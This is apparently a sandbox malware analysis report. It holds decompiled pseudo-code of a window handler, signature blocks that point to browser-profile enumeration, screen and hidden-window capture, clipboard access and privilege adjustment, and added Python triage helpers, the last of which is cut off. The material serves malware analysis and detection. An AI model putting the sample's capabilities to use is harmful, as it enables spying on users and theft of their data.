                                          										GetAncestor();
                                          										_t237 = _t186;
                                          									}
                                          									goto L78;
                                          								}
                                          								__eflags = _t157;
                                          								if(_t157 != 0) {
                                          									goto L71;
                                          								}
                                          								goto L70;
                                          							}
                                          							__eflags = _t157;
                                          							if(_t157 != 0) {
                                          								goto L48;
                                          							}
                                          							goto L97;
                                          						}
                                          						__eflags = _t82 - 3;
                                          						if(_t82 == 3) {
                                          							__eflags = _t119 - 0xa3;
                                          							if(_t119 != 0xa3) {
                                          								__eflags = _t119 - 0xa5;
                                          								if(_t119 != 0xa5) {
                                          									goto L74;
                                          								}
                                          								_t120 = 0xffff;
                                          								goto L59;
                                          							}
                                          							_t82 = GetSystemMenu();
                                          							__eflags = _t186;
                                          							if(_t186 == 0) {
                                          								goto L74;
                                          							}
                                          							r8d = r13d;
                                          							_t94 = GetMenuDefaultItem(??, ??, ??);
                                          							 *((intOrPtr*)(_t246 + 0x60)) = 0x50;
                                          							_t120 = _t94;
                                          							r8d = 0;
                                          							 *(_t246 + 0x64) = 1;
                                          							_t82 = GetMenuItemInfoA(??, ??, ??, ??);
                                          							_t123 = 0xffff;
                                          							__eflags = _t82;
                                          							if(_t82 != 0) {
                                          								__eflags =  *(_t246 + 0x6c) & 0x00000003;
                                          								if(( *(_t246 + 0x6c) & 0x00000003) != 0) {
                                          									_t120 = 0;
                                          								}
                                          							}
                                          							goto L59;
                                          						}
                                          						__eflags = _t82 - 5;
                                          						if(_t82 == 5) {
                                          							__eflags = _t119 - 0xa1;
                                          							if(_t119 != 0xa1) {
                                          								__eflags = _t119 - 0xa0;
                                          								if(_t119 != 0xa0) {
                                          									goto L64;
                                          								}
                                          								L51:
                                          								r9d = 0;
                                          								goto L73;
                                          							}
                                          							r8d = 1;
                                          							goto L51;
                                          						}
                                          						_t158 = _t267 - 1;
                                          						__eflags = _t82 + 0xfffffffa - _t158;
                                          						if(_t82 + 0xfffffffa > _t158) {
                                          							goto L48;
                                          						}
                                          						__eflags = _t119 - 0xa5;
                                          						if(_t119 == 0xa5) {
                                          							goto L71;
                                          						}
                                          						__eflags = _t119 - 0xa1;
                                          						if(_t119 == 0xa1) {
                                          							_t97 = GetWindowThreadProcessId();
                                          							 *(_t246 + 0x20) = _t158;
                                          							__eflags = 0;
                                          							r9d = 0;
                                          							E00C78CFC(_t97, 0, _t186, _t190, _t240, _t243, _t237);
                                          						}
                                          						goto L48;
                                          					}
                                          					r8d = 0;
                                          					_t100 = E00C81978(_t122, 0, _t186, _t198, _t230);
                                          					r8d = r13d;
                                          					E00C78DE0(_t190, _t240, _t237, _t240, _t243,  *((intOrPtr*)(_t246 + 0x130)));
                                          					r8d = _t100 & 0x0000ffff;
                                          					goto L73;
                                          				}
                                          				_t122 = 0x49;
                                          				asm("bt ecx, eax");
                                          				if(_t161 >= 0) {
                                          					goto L36;
                                          				} else {
                                          					_t186 =  *((intOrPtr*)(_t240 + 0x38));
                                          					_t122 = 0;
                                          					 *(_t186 + 0x168) = 0;
                                          					if(_t237 ==  *((intOrPtr*)(_t240 + 0x138)) || _t237 ==  *((intOrPtr*)(_t240 + 0x148)) || _t237 ==  *((intOrPtr*)(_t240 + 0x140))) {
                                          						_t186 =  *((intOrPtr*)(_t240 + 0x38));
                                          						_t256 =  *((intOrPtr*)(_t246 + 0x128));
                                          						r8d = 9;
                                          						 *(_t246 + 0x30) = _t246 + 0x50;
                                          						 *((intOrPtr*)(_t246 + 0x28)) = 0x3e8;
                                          						 *(_t246 + 0x20) = 2;
                                          						_t81 = SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
                                          						if(_t186 != 0) {
                                          							_t186 =  *((intOrPtr*)(_t240 + 0x38));
                                          							r8d = 1;
                                          							 *(_t186 + 0x168) = r8d;
                                          						}
                                          					}
                                          					if(E00C7BFC8(_t81, _t190, _t274, _t237) == 0) {
                                          						_t234 = _t190;
                                          						_t103 = E00C7BFC8(_t102, _t190, _t274, _t234);
                                          						_t122 = 0;
                                          						__eflags = _t103;
                                          						_t230 =  !=  ? _t190 : _t234;
                                          					} else {
                                          						_t230 = _t237;
                                          					}
                                          					E00C7B7B0(_t190, _t274, _t230, _t237, _t240, _t243, _t248, _t256);
                                          					if(E00C6ADD8() > 5) {
                                          						_t168 = _t237 -  *((intOrPtr*)(_t240 + 0xe8));
                                          						if(_t237 ==  *((intOrPtr*)(_t240 + 0xe8))) {
                                          							E00C7C170(_t168, _t186, _t190, _t240, _t237, _t240, _t243, _t248, _t256);
                                          							_t237 =  *((intOrPtr*)(_t240 + 0xc8));
                                          							_t270 =  *((intOrPtr*)(_t240 + 0xe8));
                                          							_t230 = _t237;
                                          							E00C7C170(_t168, _t186, _t190, _t240, _t230, _t240, _t243, _t248, _t256);
                                          						}
                                          					}
                                          					if(r13d != 0x201) {
                                          						__eflags = r13d - 0x204;
                                          						r8d = 0;
                                          						_t28 = _t230 + 0xb; // 0xb
                                          						r8d =  ==  ? _t28 : r8d;
                                          					} else {
                                          						r8d = 0xa;
                                          					}
                                          					if(_t237 ==  *((intOrPtr*)(_t240 + 0x100)) && _t248 != 0) {
                                          						_t186 =  *((intOrPtr*)(_t240 + 0x38));
                                          						_t256 =  *((intOrPtr*)(_t246 + 0x128));
                                          						PostMessageA(??, ??, ??, ??);
                                          					}
                                          					_t192 =  *(_t240 + 0x248);
                                          					if(E00C6ADD8() <= 5 || _t192 !=  *((intOrPtr*)(_t240 + 0xe8)) && _t192 !=  *((intOrPtr*)(_t240 + 0xc8))) {
                                          						E00C7F480(_t192, _t240);
                                          						_t190 = _t186;
                                          					}
                                          					if(_t270 == _t190) {
                                          						goto L36;
                                          					} else {
                                          						_t230 = _t270;
                                          						if((E00C7BB64(_t186, _t190, _t274, _t270, _t256) & 0x00000010) != 0) {
                                          							goto L36;
                                          						}
                                          						_t186 =  *(_t246 + 0x40);
                                          						if(_t186 != 0) {
                                          							_t237 = _t186;
                                          							GetAncestor(??, ??);
                                          							_t270 = _t186;
                                          						}
                                          						GetWindow();
                                          						if(_t270 != _t186) {
                                          							L32:
                                          							_t230 = _t270;
                                          							E00C7C170(_t180, _t186, _t190, _t240, _t270, _t240, _t243, _t248, _t256);
                                          							r9d = r13w & 0xffffffff;
                                          							_t256 = _t256 << 0x00000010 | _t186;
                                          							_t186 = _t246 + 0x48;
                                          							 *(_t246 + 0x30) = _t186;
                                          							 *((intOrPtr*)(_t246 + 0x28)) = 0x64;
                                          							 *(_t246 + 0x20) = 2;
                                          							_t82 = SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
                                          							if(_t186 == 0) {
                                          								L34:
                                          								if(E00C6ADD8() > 5) {
                                          									 *(_t240 + 0x248) = _t270;
                                          								}
                                          								goto L36;
                                          							}
                                          							_t186 =  *((intOrPtr*)(_t246 + 0x48)) + 0xfffffffe;
                                          							if((_t186 & 0xfffffffd) == 0) {
                                          								goto L74;
                                          							}
                                          							goto L34;
                                          						} else {
                                          							_t230 = _t246 + 0x60;
                                          							 *((intOrPtr*)(_t246 + 0x60)) = 0x3c;
                                          							if(GetWindowInfo(??, ??) == 0) {
                                          								goto L32;
                                          							}
                                          							_t180 =  *(_t246 + 0x88) & 0x00000080;
                                          							if(( *(_t246 + 0x88) & 0x00000080) != 0) {
                                          								goto L36;
                                          							}
                                          							goto L32;
                                          						}
                                          					}
                                          				}
                                          			}
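The decompiled handler above branches on raw numeric literals that the disassembler could not name: the message IDs compared against _t119 (0xa0 to 0xa5), the system-command codes loaded into _t120 (0xf020, 0xf180), the cbSize values written before GetWindowInfo (0x3c) and GetMenuItemInfoA (0x50), and the mask applied to the dwExStyle field of the WINDOWINFO buffer (0x00000080). The following is an added helper, not part of the Joe Sandbox report and not code from the sample; it annotates such lines with names from winuser.h so that a triage reader can see that this routine reacts to non-client mouse input (WM_NC*BUTTON*), inspects the window's system menu default item, and skips tool windows. Assumptions to note: the readings of 0x3c and 0x50 as structure sizes, of 0x3e8 as a SendMessageTimeout timeout and of 0x80 as WS_EX_TOOLWINDOW are my interpretation of the calls each literal sits next to, and the small integers 2, 3 and 5 that the code uses as hit-test results are left for manual resolution because the same values mean different things elsewhere.

```python
import re
from typing import Dict, Set

# Win32 constants that occur as bare literals in the decompiled function above.
# Values are from the Windows SDK (winuser.h). The table is tailored to this one
# function: a literal only means what the call around it makes it mean, so the
# ambiguous small integers 2, 3 and 5 (HTCAPTION / HTSYSMENU / HTMENU here) are
# deliberately left out rather than guessed at.
WIN32_CONSTANTS: Dict[int, str] = {
    0x00A0: "WM_NCMOUSEMOVE",
    0x00A1: "WM_NCLBUTTONDOWN",
    0x00A2: "WM_NCLBUTTONUP",
    0x00A3: "WM_NCLBUTTONDBLCLK",
    0x00A4: "WM_NCRBUTTONDOWN",
    0x00A5: "WM_NCRBUTTONUP",
    0x0201: "WM_LBUTTONDOWN",
    0x0204: "WM_RBUTTONDOWN",
    0xF020: "SC_MINIMIZE",
    0xF180: "SC_CONTEXTHELP",
    0x003C: "sizeof(WINDOWINFO)",          # assumption: cbSize before GetWindowInfo
    0x0050: "sizeof(MENUITEMINFOA), x64",  # assumption: cbSize before GetMenuItemInfoA
    0x0080: "WS_EX_TOOLWINDOW",            # assumption: mask on WINDOWINFO.dwExStyle
    0x03E8: "1000 ms (SendMessageTimeout uTimeout)",  # assumption: stack arg at +0x28
}

# 0x-prefixed literal with any number of leading zeros. Literals that directly
# follow a '+' are structure/stack displacements, not constants, and are skipped.
HEX_LITERAL = re.compile(r"(?<!\+ )(?<!\+)\b0x([0-9A-Fa-f]+)\b")


def annotate_line(line: str) -> str:
    """Append a C-style comment naming each known constant on one pseudo-code line."""
    def name_it(match: "re.Match[str]") -> str:
        name = WIN32_CONSTANTS.get(int(match.group(1), 16))
        return match.group(0) if name is None else f"{match.group(0)} /* {name} */"
    return HEX_LITERAL.sub(name_it, line)


def annotate(pseudocode: str) -> str:
    """Annotate every line of a decompiled excerpt, keeping its indentation."""
    return "\n".join(annotate_line(line) for line in pseudocode.splitlines())


def messages_tested(pseudocode: str) -> Set[str]:
    """Return the WM_* names the excerpt compares against: a one-glance summary
    of which window events the handler reacts to."""
    found: Set[str] = set()
    for match in HEX_LITERAL.finditer(pseudocode):
        name = WIN32_CONSTANTS.get(int(match.group(1), 16), "")
        if name.startswith("WM_"):
            found.add(name)
    return found


# Constructed sample input: a few lines copied from the decompiled function on
# this page, so the helper can be run offline.
SAMPLE = """\
__eflags = _t119 - 0xa2;
if(_t119 != 0xa2) {
    __eflags = _t119 - 0xa5;
    if(_t119 == 0xa5) {
        goto L84;
    }
    __eflags = _t119 - 0xa1;
    if(_t119 != 0xa1) {
        goto L74;
    }
}
_t120 = 0xf180;
 *((intOrPtr*)(_t246 + 0x60)) = 0x3c;
if(GetWindowInfo(??, ??) == 0) {
_t180 =  *(_t246 + 0x88) & 0x00000080;
"""

if __name__ == "__main__":
    print(annotate(SAMPLE))
    print("messages tested:", sorted(messages_tested(SAMPLE)))
```

Run it over the whole decompiled function rather than the sample to get the full picture; the one thing it will not tell you is the meaning of the hit-test values in _t82, which have to be read off the surrounding GetSystemMenu / GetMenuDefaultItem calls by hand.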
Instruction address column for the decompiled function above (addresses 0x00c78f34 to 0x00c795c0, with 0x00000000 on lines that have no address of their own).
                                          0x00c791c7
                                          0x00c791cf
                                          0x00c791d2
                                          0x00c791d7
                                          0x00c791dc
                                          0x00c791e4
                                          0x00c791ec
                                          0x00c791f5
                                          0x00c7920c
                                          0x00c79214
                                          0x00c79216
                                          0x00c79216
                                          0x00000000
                                          0x00c79214
                                          0x00c791fc
                                          0x00c79206
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c79184
                                          0x00c79184
                                          0x00c79189
                                          0x00c7919c
                                          0x00000000
                                          0x00000000
                                          0x00c7919e
                                          0x00c791a6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c791a6
                                          0x00c79182
                                          0x00c7913a

                                          APIs
                                          • GetAncestor.USER32 ref: 00C78F61
                                            • Part of subcall function 00C7BA38: GetWindowLongPtrA.USER32 ref: 00C7BA6C
                                            • Part of subcall function 00C7BA38: GetLastActivePopup.USER32 ref: 00C7BA80
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BA9D
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAAB
                                            • Part of subcall function 00C7BA38: GetWindowInfo.USER32 ref: 00C7BAC4
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAD2
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB1B
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB2F
                                            • Part of subcall function 00C7BF60: GetParent.USER32 ref: 00C7BF74
                                            • Part of subcall function 00C7BF60: GetClassNameA.USER32 ref: 00C7BF88
                                            • Part of subcall function 00C7BF60: lstrcmpiA.KERNEL32 ref: 00C7BF9A
                                            • Part of subcall function 00C7BF60: GetParent.USER32 ref: 00C7BFA7
                                          • SendMessageTimeoutA.USER32 ref: 00C79038
                                          • PostMessageA.USER32 ref: 00C79103
                                          • GetAncestor.USER32 ref: 00C79168
                                          • GetWindow.USER32 ref: 00C79179
                                            • Part of subcall function 00C7BFC8: GetWindowLongPtrA.USER32 ref: 00C7BFE0
                                            • Part of subcall function 00C7BFC8: GetWindowLongPtrA.USER32 ref: 00C7BFF2
                                          • GetWindowInfo.USER32 ref: 00C79194
                                          • SendMessageTimeoutA.USER32 ref: 00C791EC
                                          • PostMessageA.USER32 ref: 00C79242
                                          • GetWindowThreadProcessId.USER32 ref: 00C79301
                                          • GetSystemMenu.USER32 ref: 00C79366
                                          • GetMenuDefaultItem.USER32 ref: 00C79380
                                          • GetMenuItemInfoA.USER32 ref: 00C793A7
                                          • GetAncestor.USER32 ref: 00C7940E
                                          • PostMessageA.USER32 ref: 00C79425
                                          • GetAncestor.USER32 ref: 00C79458
                                          • GetWindowThreadProcessId.USER32 ref: 00C79466
                                          • GetAncestor.USER32 ref: 00C794A3
                                          • GetAncestor.USER32 ref: 00C79520
                                          • GetAncestor.USER32 ref: 00C7954E
                                          • GetAncestor.USER32 ref: 00C7959C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Ancestor$Message$InfoLongMenuPost$ItemParentProcessSendThreadTimeout$ActiveClassDefaultLastNamePopupSystemlstrcmpi
                                          • String ID: P$d
                                          • API String ID: 2910538575-684372805
                                          • Opcode ID: 608e139f5b66411c8089a4f002a398f5403233e2b0cb12ec7e97354b9a55ee70
                                          • Instruction ID: 4fdf2959f78eaecad2f3655706b0368fbdfb4e5c80e03586c813f1228f573a87
                                          • Opcode Fuzzy Hash: 608e139f5b66411c8089a4f002a398f5403233e2b0cb12ec7e97354b9a55ee70
                                          • Instruction Fuzzy Hash: FDE1137130479082EB34AB2299847BE7361F78ABD0F54C125DEAE47BA5DF3DCA468701
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Alloclstrlen$Freelstrcatlstrcpymemset
                                          • String ID: $.
                                          • API String ID: 3601794232-3929174939
                                          • Opcode ID: fc49b2b665f4c1a4cec1620135a6585055db25bc90478505097b555100a4afe3
                                          • Instruction ID: e8a65cf9390c3a13ca1e86ab2a2014211b1312c4385d0fc782e2a2c5dd567540
                                          • Opcode Fuzzy Hash: fc49b2b665f4c1a4cec1620135a6585055db25bc90478505097b555100a4afe3
                                          • Instruction Fuzzy Hash: E751CA35304B4087EB60DB26E89476D73A1F788FA8F948221DA5643B64DF7CC54DC708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Find$AllocErrorFileHeapLastlstrcatlstrcpylstrlenmemset$CloseFirstNext
                                          • String ID: .$Profiles\$\Profiles\*
                                          • API String ID: 1005269558-3249454066
                                          • Opcode ID: d1781df1b183ca5802db71715d052934797f7d0922d226036fa6e30c4096039c
                                          • Instruction ID: e281ff3591165f777d8ecd5e14f676d65800eec054cb7b5c17140c806070b22d
                                          • Opcode Fuzzy Hash: d1781df1b183ca5802db71715d052934797f7d0922d226036fa6e30c4096039c
                                          • Instruction Fuzzy Hash: 29313C25304E4192FB24DB26E9587696361F788BA4F84C225DD6E03BA8DF3CC54ECB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                          • GetWindowInfo.USER32 ref: 00C694FC
                                          • GetParent.USER32 ref: 00C69505
                                            • Part of subcall function 00C7BB64: GetParent.USER32 ref: 00C7BCA4
                                          • RedrawWindow.USER32 ref: 00C695AE
                                          • SendMessageTimeoutA.USER32 ref: 00C695DC
                                          • PrintWindow.USER32 ref: 00C695EF
                                          • DefWindowProcA.USER32 ref: 00C6960A
                                          • WaitForSingleObject.KERNEL32 ref: 00C69616
                                          • SetViewportOrgEx.GDI32 ref: 00C6962D
                                          • BitBlt.GDI32 ref: 00C69690
                                          • ReleaseMutex.KERNEL32 ref: 00C69699
                                          • GetClassLongPtrA.USER32 ref: 00C696AC
                                          • DefWindowProcA.USER32 ref: 00C696CB
                                          • PrintWindow.USER32 ref: 00C696DD
                                          • ScreenToClient.USER32 ref: 00C696F6
                                          • BitBlt.GDI32 ref: 00C6973C
                                          • DefWindowProcA.USER32 ref: 00C69757
                                            • Part of subcall function 00C69858: GetWindowInfo.USER32 ref: 00C69881
                                            • Part of subcall function 00C69858: SetWindowLongPtrA.USER32 ref: 00C698AC
                                            • Part of subcall function 00C69858: SetLayeredWindowAttributes.USER32 ref: 00C698C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Proc$InfoLongParentPrint$AncestorAttributesClassClientLayeredMessageMutexObjectRedrawReleaseScreenSendSingleTimeoutViewportWait
                                          • String ID:
                                          • API String ID: 3861020745-3916222277
                                          • Opcode ID: 90ce38d1bf5d4b19e57f273841950ee4b88714ce944c4fe0e29aed510158e8ee
                                          • Instruction ID: 0dab4fe58c43a090f46860f858e85b0b4195ba31b98e080d0d35d9a2a25ee0bd
                                          • Opcode Fuzzy Hash: 90ce38d1bf5d4b19e57f273841950ee4b88714ce944c4fe0e29aed510158e8ee
                                          • Instruction Fuzzy Hash: 27716B36314A808BEB64DF26E444B9D77A4F788B88F408225EE1A57F58DF38D659CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$Close$CertErrorLastObjectParamQueryStore
                                          • String ID: 1.3.6.1.4.1.311.2.1.12
                                          • API String ID: 3517585230-2596186611
                                          • Opcode ID: fcc0127373eed84aa2cd52b39438997d717c3cde8f4ae69e345e3180f0d3fcb0
                                          • Instruction ID: 537f0f3efd79523cffb29391fca93f0337e9c7ec1b376d5394ab69c07d59753a
                                          • Opcode Fuzzy Hash: fcc0127373eed84aa2cd52b39438997d717c3cde8f4ae69e345e3180f0d3fcb0
                                          • Instruction Fuzzy Hash: 80918032205B4096EB30DF26E4D0B6E73A5FB88B84F548225DE5E53B14DF39C989DB05
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$AddressCurrentModuleOpenProcProcessThreadToken$CloseErrorLastState
                                          • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeShutdownPrivilege$advapi32.dll
                                          • API String ID: 537737460-4041583698
                                          • Opcode ID: f8d09f21bf47fff0310ce2f28e2844b076f61b662b9509bfd85fa9d1220b4c88
                                          • Instruction ID: dd8f6c1517e235ee6374de03768d59b67c1fe31d1c31b8e9f6de7b9bc0f21fad
                                          • Opcode Fuzzy Hash: f8d09f21bf47fff0310ce2f28e2844b076f61b662b9509bfd85fa9d1220b4c88
                                          • Instruction Fuzzy Hash: 05314B75204B8586FB10DF61F858B9A7760FB84BE0F848325EA9A43A64DF78C94DCB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboardlstrlen$Window$GlobalHeapLongMessageNotifySend$AllocCloseDataFreeLockOpenOwnerProcUnlock
                                          • String ID:
                                          • API String ID: 768402609-0
                                          • Opcode ID: 947b95007c8f6e0e9c46a1cbbcceb14dee5d4bfa3e6e2c1864d490e66d14890e
                                          • Instruction ID: 39e50526913a6609383b55abb0a0d57e4bd474ac1a458c1a21b3fdfb5b6b1d53
                                          • Opcode Fuzzy Hash: 947b95007c8f6e0e9c46a1cbbcceb14dee5d4bfa3e6e2c1864d490e66d14890e
                                          • Instruction Fuzzy Hash: C751A521205BC082FF25AF6699547397751EB85FD8F499624CE2A57B60DF3CC74A830C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDC.USER32 ref: 00C7EB0F
                                          • GetDeviceCaps.GDI32 ref: 00C7EB22
                                          • GetDeviceCaps.GDI32 ref: 00C7EB3B
                                          • GetDeviceCaps.GDI32 ref: 00C7EB4D
                                          • CreateCompatibleBitmap.GDI32 ref: 00C7EB70
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000088,?,?,00C7E34A,?,?,?,00000000,00000000,00C688C0), ref: 00C7EB85
                                          • ReleaseDC.USER32 ref: 00C7EE18
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CapsDevice$BitmapCompatibleCreateErrorLastRelease
                                          • String ID:
                                          • API String ID: 3333975890-0
                                          • Opcode ID: 8fc4c0117995995b8a16993d826de7817755479c5791fc66ace8fbbe1dd7df6b
                                          • Instruction ID: 36c259e162a7376e626f1417b0bc6d07516d175bb94419b132256af85dbbf7fc
                                          • Opcode Fuzzy Hash: 8fc4c0117995995b8a16993d826de7817755479c5791fc66ace8fbbe1dd7df6b
                                          • Instruction Fuzzy Hash: 1591057731428187E7388F36E804B2A7BA1F759B88F88C558CE5A87B58DF38D965C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%
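A triage pass over the per-function signature blocks above, added here as an example and not part of the Joe Sandbox report: the script parses the "API ID:" and "String ID:" lines, splits the run-together API-name fragments back into words, and tags each function with the capability its API cluster and strings suggest (window enumeration, capture of off-screen or layered windows, screen capture, profile-directory enumeration under Profiles\, Authenticode inspection via the 1.3.6.1.4.1.311.2.1.12 OID, SeShutdownPrivilege adjustment, clipboard access). The capability table, the tokenizer and the helper names are this example's own constructions; the sample input is a constructed copy of the ID lines from the blocks above.

```python
"""Map Joe Sandbox "API ID" / "String ID" signature lines to capabilities.

Added example, not part of the Joe Sandbox report. The RULES table and the
tokenizer are this example's own heuristics, not Joe Sandbox logic.
"""
import re

# Constructed sample input: the "API ID" / "String ID" pairs copied from the
# per-function signature blocks of the report (one pair per function).
SAMPLE_REPORT = r"""
• API ID: Window$Ancestor$Message$InfoLongMenuPost$ItemParentProcessSendThreadTimeout$ActiveClassDefaultLastNamePopupSystemlstrcmpi
• String ID: P$d
• API ID: Find$AllocErrorFileHeapLastlstrcatlstrcpylstrlenmemset$CloseFirstNext
• String ID: .$Profiles\$\Profiles\*
• API ID: Window$Proc$InfoLongParentPrint$AncestorAttributesClassClientLayeredMessageMutexObjectRedrawReleaseScreenSendSingleTimeoutViewportWait
• String ID:
• API ID: Crypt$Close$CertErrorLastObjectParamQueryStore
• String ID: 1.3.6.1.4.1.311.2.1.12
• API ID: Handle$AddressCurrentModuleOpenProcProcessThreadToken$CloseErrorLastState
• String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeShutdownPrivilege$advapi32.dll
• API ID: Clipboardlstrlen$Window$GlobalHeapLongMessageNotifySend$AllocCloseDataFreeLockOpenOwnerProcUnlock
• String ID:
• API ID: CapsDevice$BitmapCompatibleCreateErrorLastRelease
• String ID:
"""

# An "API ID" is a "$"-separated list of groups; each group is the word
# fragments of several API names run together (e.g. "CapsDevice" for
# GetDeviceCaps). CRT/lstr names are glued on in lowercase, so a word ends
# at the next capital letter or at a known lowercase prefix (heuristic).
_STOP = r"(?=[A-Z]|lstr|mem|wcs|$)"
_TOKEN_RE = re.compile(rf"(?:lstr|mem|wcs)[a-z]*?{_STOP}|[A-Z][a-z]*?{_STOP}")


def tokenize(api_id):
    """Split an API ID into its word fragments, group by group."""
    tokens = []
    for group in api_id.split("$"):
        tokens.extend(_TOKEN_RE.findall(group))
    return tokens


def parse_signatures(report_text):
    """Return (api_id, string_id) pairs; 'API String ID:' lines are skipped."""
    pairs, pending = [], None
    for line in report_text.splitlines():
        m = re.search(r"\bAPI ID:\s*(.*)$", line)
        if m:
            pending = m.group(1).strip()
            continue
        m = re.search(r"(?<!API )String ID:\s*(.*)$", line)
        if m and pending is not None:
            pairs.append((pending, m.group(1).strip()))
            pending = None
    return pairs


# (capability, required API word fragments, required String-ID substrings).
# Heuristic thresholds chosen for this sample; tune before reuse.
RULES = [
    ("window_enumeration",       {"Window", "Ancestor", "Message"}, ()),
    ("offscreen_window_capture", {"Window", "Print", "Layered"}, ()),
    ("screen_capture",           {"Device", "Caps", "Bitmap", "Compatible"}, ()),
    ("browser_profile_enum",     {"Find", "First", "Next"}, ("Profiles\\",)),
    # 1.3.6.1.4.1.311.2.1.12 is szOID_SPC_SP_OPUS_INFO, an Authenticode attribute.
    ("authenticode_inspection",  {"Crypt", "Cert", "Query"}, ("1.3.6.1.4.1.311.2.1.12",)),
    ("privilege_adjustment",     {"Token", "Process"}, ("AdjustTokenPrivileges",)),
    ("clipboard_access",         {"Clipboard", "Data", "Open"}, ()),
]


def classify(api_id, string_id):
    """Capabilities whose API words and strings are all present, in RULES order."""
    words = set(tokenize(api_id))
    return [name for name, need_words, need_strs in RULES
            if need_words <= words and all(s in string_id for s in need_strs)]


def triage(report_text):
    """One record per function block: raw IDs, tokens and matched capabilities."""
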